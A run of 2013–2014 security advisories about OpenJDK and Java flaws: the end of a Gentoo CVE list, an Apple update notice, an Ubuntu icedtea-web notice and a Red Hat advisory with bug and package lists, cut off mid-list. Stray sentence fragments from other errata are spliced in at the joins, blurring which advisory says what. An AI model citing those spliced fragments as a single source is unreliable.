CVE-2013-1557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557\n[ 132 ] CVE-2013-1569\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569\n[ 133 ] CVE-2013-1571\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571\n[ 134 ] CVE-2013-2383\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383\n[ 135 ] CVE-2013-2384\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384\n[ 136 ] CVE-2013-2407\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407\n[ 137 ] CVE-2013-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412\n[ 138 ] CVE-2013-2415\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415\n[ 139 ] CVE-2013-2417\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417\n[ 140 ] CVE-2013-2419\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419\n[ 141 ] CVE-2013-2420\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420\n[ 142 ] CVE-2013-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421\n[ 143 ] CVE-2013-2422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422\n[ 144 ] CVE-2013-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423\n[ 145 ] CVE-2013-2424\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424\n[ 146 ] CVE-2013-2426\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426\n[ 147 ] CVE-2013-2429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429\n[ 148 ] CVE-2013-2430\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430\n[ 149 ] CVE-2013-2431\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431\n[ 150 ] CVE-2013-2436\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436\n[ 151 ] CVE-2013-2443\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443\n[ 152 ] CVE-2013-2444\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444\n[ 153 ] CVE-2013-2445\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445\n[ 154 ] CVE-2013-2446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446\n[ 155 ] CVE-2013-2447\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447\n[ 156 ] CVE-2013-2448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448\n[ 157 ] CVE-2013-2449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449\n[ 158 ] CVE-2013-2450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450\n[ 159 ] CVE-2013-2451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451\n[ 160 ] CVE-2013-2452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452\n[ 161 ] CVE-2013-2453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453\n[ 162 ] CVE-2013-2454\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454\n[ 163 ] CVE-2013-2455\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455\n[ 164 ] CVE-2013-2456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456\n[ 165 ] CVE-2013-2457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457\n[ 166 ] CVE-2013-2458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458\n[ 167 ] CVE-2013-2459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459\n[ 168 ] CVE-2013-2460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460\n[ 169 ] CVE-2013-2461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461\n[ 170 ] CVE-2013-2463\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463\n[ 171 ] CVE-2013-2465\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465\n[ 172 ] CVE-2013-2469\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469\n[ 173 ] CVE-2013-2470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470\n[ 174 ] CVE-2013-2471\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471\n[ 175 ] CVE-2013-2472\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472\n[ 176 ] CVE-2013-2473\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473\n[ 177 ] CVE-2013-3829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829\n[ 178 ] CVE-2013-4002\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4002\n[ 179 ] CVE-2013-5772\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772\n[ 180 ] CVE-2013-5774\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774\n[ 181 ] CVE-2013-5778\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778\n[ 182 ] CVE-2013-5780\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780\n[ 183 ] CVE-2013-5782\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782\n[ 184 ] CVE-2013-5783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783\n[ 185 ] CVE-2013-5784\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784\n[ 186 ] CVE-2013-5790\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790\n[ 187 ] CVE-2013-5797\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797\n[ 188 ] CVE-2013-5800\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800\n[ 189 ] CVE-2013-5802\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802\n[ 190 ] CVE-2013-5803\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803\n[ 191 ] CVE-2013-5804\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804\n[ 192 ] CVE-2013-5805\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805\n[ 193 ] CVE-2013-5806\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806\n[ 194 ] CVE-2013-5809\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809\n[ 195 ] CVE-2013-5814\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814\n[ 196 ] CVE-2013-5817\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817\n[ 197 ] CVE-2013-5820\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820\n[ 198 ] CVE-2013-5823\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823\n[ 199 ] CVE-2013-5825\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825\n[ 200 ] CVE-2013-5829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829\n[ 201 ] CVE-2013-5830\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830\n[ 202 ] CVE-2013-5840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840\n[ 203 ] CVE-2013-5842\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842\n[ 204 ] CVE-2013-5849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849\n[ 205 ] CVE-2013-5850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850\n[ 206 ] CVE-2013-5851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851\n[ 207 ] CVE-2013-6629\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6629\n[ 208 ] CVE-2013-6954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6954\n[ 209 ] CVE-2014-0429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429\n[ 210 ] CVE-2014-0446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446\n[ 211 ] CVE-2014-0451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451\n[ 212 ] CVE-2014-0452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452\n[ 213 ] CVE-2014-0453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453\n[ 214 ] CVE-2014-0456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456\n[ 215 ] CVE-2014-0457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457\n[ 216 ] CVE-2014-0458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458\n[ 217 ] CVE-2014-0459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459\n[ 218 ] CVE-2014-0460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460\n[ 219 ] CVE-2014-0461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461\n[ 220 ] CVE-2014-1876\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1876\n[ 221 ] CVE-2014-2397\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397\n[ 222 ] CVE-2014-2398\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398\n[ 223 ] CVE-2014-2403\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403\n[ 224 ] CVE-2014-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412\n[ 225 ] CVE-2014-2414\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414\n[ 226 ] CVE-2014-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421\n[ 227 ] CVE-2014-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423\n[ 228 ] CVE-2014-2427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201406-32.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. (CVE-2013-2412)\n\nIt was discovered that GnomeFileTypeDetector did not check for read\npermissions when accessing files. \n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.10. Refer to\nthe NEWS file, linked to in the References, for further information. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nAPPLE-SA-2013-06-18-1 Java for OS X 2013-004 and\nMac OS X v10.6 Update 16\n\nJava for OS X 2013-004 and Mac OS X v10.6 Update 16 is now available\nand addresses the following:\n\nJava\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\nOS X Lion v10.7 or later, OS X Lion Server v10.7 or later,\nOS X Mountain Lion 10.8 or later\nImpact: Multiple vulnerabilities in Java 1.6.0_45\nDescription: 8011782 Multiple vulnerabilities existed in Java\n1.6.0_45, the most serious of which may allow an untrusted Java\napplet to execute arbitrary code outside the Java sandbox. These issues were addressed by updating to Java version\n1.6.0_51. Further information is available via the Java website at ht\ntp://www.oracle.com/technetwork/java/javase/releasenotes-136954.html\nCVE-ID\nCVE-2013-1500\nCVE-2013-1571\nCVE-2013-2407\nCVE-2013-2412\nCVE-2013-2437\nCVE-2013-2442\nCVE-2013-2443\nCVE-2013-2444\nCVE-2013-2445\nCVE-2013-2446\nCVE-2013-2447\nCVE-2013-2448\nCVE-2013-2450\nCVE-2013-2451\nCVE-2013-2452\nCVE-2013-2453\nCVE-2013-2454\nCVE-2013-2455\nCVE-2013-2456\nCVE-2013-2457\nCVE-2013-2459\nCVE-2013-2461\nCVE-2013-2463\nCVE-2013-2464\nCVE-2013-2465\nCVE-2013-2466\nCVE-2013-2468\nCVE-2013-2469\nCVE-2013-2470\nCVE-2013-2471\nCVE-2013-2472\nCVE-2013-2473\nCVE-2013-3743\nCVE_2013-2445\n\n\nJava for OS X 2013-004 and Mac OS X v10.6 Update 16\nmay be obtained from the Software Update pane in System Preferences,\nMac App Store, or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nFor Mac OS X v10.6 systems\nThe download file is named: JavaForMacOSX10.6.Update16.dmg\nIts SHA-1 digest is: a6b5a9caa3c0d9acf743da8e4c0e5cfe4e471b01\n\nFor OS X Lion and Mountain Lion systems\nThe download file is named: JavaForOSX2013-004.dmg\nIts SHA-1 digest is: 153c3f74d5285d10008fce2004d904da8d2ffdff\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2.0.17 (Darwin)\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBAgAGBQJRwL5AAAoJEPefwLHPlZEwju0QALM1IST/ATt2xR1L0AQcaZRX\neiM07MlvAlE9Jv45xqKLUezRU8XQT6+glN51/hBhpyCa8MJIzPiSnnOIAW+vbA5o\nRjXQTGPGT1IPSfEk7OWS++566riMLmTOvg45Qn0E/ibOqJHpfrR4wzQX5jpv7lzH\nEbdKxn+KWfHCF2y/2LCFifDHUBPCjUlbWTRznDCYVHsFbtDiP/vAZiSXsNJtLTXK\nUOD/eGbel2PEqWOOsUNIrzwvztRB+LsYT4xKQQnsEKJqoyMch/UgB1Uo2jgEPn0U\nYP3WZbjbDV+UcM+yMoCV/qDFhbJ+qBxTbuwYOHuSDpgqJ7vF8s0cdUUb6U7QLW4/\n3ykC7vOUS/JqYkiqwUxuKVpzSUYXrlez36sQuwCR9AOGCJ/0/MwM8QPavFAdGisP\n36ZavJ4k2Dp2CfVmWjexpWY7XN9M36Lh57XChxQk9TcbjUJRrqNadlPyzaja3G9a\n95Dq1N1dYfLuFm4MtyeDA0xQl8m8ljnSxH3TQoDcTwvvWGIGdG7EEVpdQqM/MTWY\nCY2EqMkY3Gouet+QvECYwxOz+g0hcaJd973kSM+5AJ7tVfod93NDW3P13k2cfdTC\nuo9IgGkhuNY40NuLpJLtTwlHcTCwBtKPt0BLwXugZdoDrgz1j8Q+fLuASSTkUQxl\n3t9MUCG40o5ZQFyWqV1+\n=zFXN\n-----END PGP SIGNATURE-----\n. Further\ninformation about these flaws can be found on the Oracle Java SE Critical\nPatch Update Advisory page, listed in the References section. ============================================================================\nUbuntu Security Notice USN-1907-2\nJuly 16, 2013\n\nicedtea-web update\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 13.04\n- Ubuntu 12.10\n- Ubuntu 12.04 LTS\n\nSummary:\n\nIcedTea Web updated to work with new OpenJDK 7. \n\nSoftware Description:\n- icedtea-web: A web browser plugin to execute Java applets\n\nDetails:\n\nUSN-1907-1 fixed vulnerabilities in OpenJDK 7. Due to upstream changes,\nIcedTea Web needed an update to work with the new OpenJDK 7. \n\nOriginal advisory details:\n\n Several vulnerabilities were discovered in the OpenJDK JRE related to\n information disclosure and data integrity. (CVE-2013-1500, CVE-2013-2454,\n CVE-2013-2458)\n\n A vulnerability was discovered in the OpenJDK Javadoc related to data\n integrity. (CVE-2013-1571)\n\n A vulnerability was discovered in the OpenJDK JRE related to information\n disclosure and availability. (CVE-2013-2412, CVE-2013-2443, CVE-2013-2446,\n CVE-2013-2447, CVE-2013-2449, CVE-2013-2452, CVE-2013-2456)\n\n Several vulnerabilities were discovered in the OpenJDK JRE related to\n availability. (CVE-2013-2448, CVE-2013-2451, CVE-2013-2459, CVE-2013-2460,\n CVE-2013-2461, CVE-2013-2463, CVE-2013-2465, CVE-2013-2469, CVE-2013-2470,\n CVE-2013-2471, CVE-2013-2472, CVE-2013-2473)\n\n Several vulnerabilities were discovered in the OpenJDK JRE related to data\n integrity. (CVE-2013-2453, CVE-2013-2455, CVE-2013-2457)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 13.04:\n icedtea-netx 1.3.2-1ubuntu1.1\n\nUbuntu 12.10:\n icedtea-netx 1.3.2-1ubuntu0.12.10.2\n\nUbuntu 12.04 LTS:\n icedtea-netx 1.2.3-0ubuntu0.12.04.3\n\nAfter a standard system update you need to restart your browser to make\nall the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: java-1.6.0-openjdk security update\nAdvisory ID: RHSA-2013:1014-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2013-1014.html\nIssue date: 2013-07-03\nCVE Names: CVE-2013-1500 CVE-2013-1571 CVE-2013-2407 \n CVE-2013-2412 CVE-2013-2443 CVE-2013-2444 \n CVE-2013-2445 CVE-2013-2446 CVE-2013-2447 \n CVE-2013-2448 CVE-2013-2450 CVE-2013-2452 \n CVE-2013-2453 CVE-2013-2455 CVE-2013-2456 \n CVE-2013-2457 CVE-2013-2459 CVE-2013-2461 \n CVE-2013-2463 CVE-2013-2465 CVE-2013-2469 \n CVE-2013-2470 CVE-2013-2471 CVE-2013-2472 \n CVE-2013-2473 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.6.0-openjdk packages that fix various security issues are\nnow available for Red Hat Enterprise Linux 5 and 6. \n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux (v. 5 server) - i386, x86_64\nRed Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit. \n\nMultiple flaws were discovered in the ImagingLib and the image attribute,\nchannel, layout and raster processing in the 2D component. An untrusted\nJava application or applet could possibly use these flaws to trigger Java\nVirtual Machine memory corruption. (CVE-2013-2470, CVE-2013-2471,\nCVE-2013-2472, CVE-2013-2473, CVE-2013-2463, CVE-2013-2465, CVE-2013-2469)\n\nInteger overflow flaws were found in the way AWT processed certain input. \nAn attacker could use these flaws to execute arbitrary code with the\nprivileges of the user running an untrusted Java applet or application. \n(CVE-2013-2459)\n\nMultiple improper permission check issues were discovered in the Sound and\nJMX components in OpenJDK. An untrusted Java application or applet could\nuse these flaws to bypass Java sandbox restrictions. (CVE-2013-2448,\nCVE-2013-2457, CVE-2013-2453)\n\nMultiple flaws in the Serialization, Networking, Libraries and CORBA\ncomponents can be exploited by an untrusted Java application or applet to\ngain access to potentially sensitive information. (CVE-2013-2456,\nCVE-2013-2447, CVE-2013-2455, CVE-2013-2452, CVE-2013-2443, CVE-2013-2446)\n\nIt was discovered that the Hotspot component did not properly handle\nout-of-memory errors. An untrusted Java application or applet could\npossibly use these flaws to terminate the Java Virtual Machine. \n(CVE-2013-2445)\n\nIt was discovered that the AWT component did not properly manage certain\nresources and that the ObjectStreamClass of the Serialization component\ndid not properly handle circular references. An untrusted Java application\nor applet could possibly use these flaws to cause a denial of service. \n(CVE-2013-2444, CVE-2013-2450)\n\nIt was discovered that the Libraries component contained certain errors\nrelated to XML security and the class loader. A remote attacker could\npossibly exploit these flaws to bypass intended security mechanisms or\ndisclose potentially sensitive information and cause a denial of service. \n(CVE-2013-2407, CVE-2013-2461)\n\nIt was discovered that JConsole did not properly inform the user when\nestablishing an SSL connection failed. An attacker could exploit this flaw\nto gain access to potentially sensitive information. (CVE-2013-2412)\n\nIt was found that documentation generated by Javadoc was vulnerable to a\nframe injection attack. If such documentation was accessible over a\nnetwork, and a remote attacker could trick a user into visiting a\nspecially-crafted URL, it would lead to arbitrary web content being\ndisplayed next to the documentation. This could be used to perform a\nphishing attack by providing frame content that spoofed a login form on\nthe site hosting the vulnerable documentation. (CVE-2013-1571)\n\nIt was discovered that the 2D component created shared memory segments with\ninsecure permissions. A local attacker could use this flaw to read or write\nto the shared memory segment. (CVE-2013-1500)\n\nRed Hat would like to thank US-CERT for reporting CVE-2013-1571, and Tim\nBrown for reporting CVE-2013-1500. US-CERT acknowledges Oracle as the\noriginal reporter of CVE-2013-1571. \n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/knowledge/articles/11258\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n973474 - CVE-2013-1571 OpenJDK: Frame injection in generated HTML (Javadoc, 8012375)\n975099 - CVE-2013-2470 OpenJDK: ImagingLib byte lookup processing (2D, 8011243)\n975102 - CVE-2013-2471 OpenJDK: Incorrect IntegerComponentRaster size checks (2D, 8011248)\n975107 - CVE-2013-2472 OpenJDK: Incorrect ShortBandedRaster size checks (2D, 8011253)\n975110 - CVE-2013-2473 OpenJDK: Incorrect ByteBandedRaster size checks (2D, 8011257)\n975115 - CVE-2013-2463 OpenJDK: Incorrect image attribute verification (2D, 8012438)\n975118 - CVE-2013-2465 OpenJDK: Incorrect image channel verification (2D, 8012597)\n975120 - CVE-2013-2469 OpenJDK: Incorrect image layout verification (2D, 8012601)\n975121 - CVE-2013-2459 OpenJDK: Various AWT integer overflow checks (AWT, 8009071)\n975124 - CVE-2013-2445 OpenJDK: Better handling of memory allocation errors (Hotspot, 7158805)\n975125 - CVE-2013-2448 OpenJDK: Better access restrictions (Sound, 8006328)\n975126 - CVE-2013-2461 OpenJDK: Missing check for valid DOMCanonicalizationMethod canonicalization algorithm (Libraries, 8014281)\n975127 - CVE-2013-2407 OpenJDK: Integrate Apache Santuario, rework class loader (Libraries, 6741606, 8008744)\n975131 - CVE-2013-2444 OpenJDK: Resource denial of service (AWT, 8001038)\n975132 - CVE-2013-2446 OpenJDK: output stream access restrictions (CORBA, 8000642)\n975133 - CVE-2013-2457 OpenJDK: Proper class checking (JMX, 8008120)\n975134 - CVE-2013-2453 OpenJDK: MBeanServer Introspector package access (JMX, 8008124)\n975137 - CVE-2013-2443 OpenJDK: AccessControlContext check order issue (Libraries, 8001330)\n975138 - CVE-2013-2452 OpenJDK: Unique VMIDs (Libraries, 8001033)\n975139 - CVE-2013-2455 OpenJDK: getEnclosing* checks (Libraries, 8007812)\n975140 - CVE-2013-2447 OpenJDK: Prevent revealing the local address (Networking, 8001318)\n975141 - CVE-2013-2450 OpenJDK: ObjectStreamClass circular reference denial of service (Serialization, 8000638)\n975142 - CVE-2013-2456 OpenJDK: ObjectOutputStream access checks (Serialization, 8008132)\n975144 - CVE-2013-2412 OpenJDK: JConsole SSL support (Serviceability, 8003703)\n975148 - CVE-2013-1500 OpenJDK: Insecure shared memory permissions (2D, 8001034)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 5 client):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.41.1.11.11.90.el5_9.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm\n\nRed Hat Enterprise Linux (v. 5 server):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.41.1.11.11.90.el5_9.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 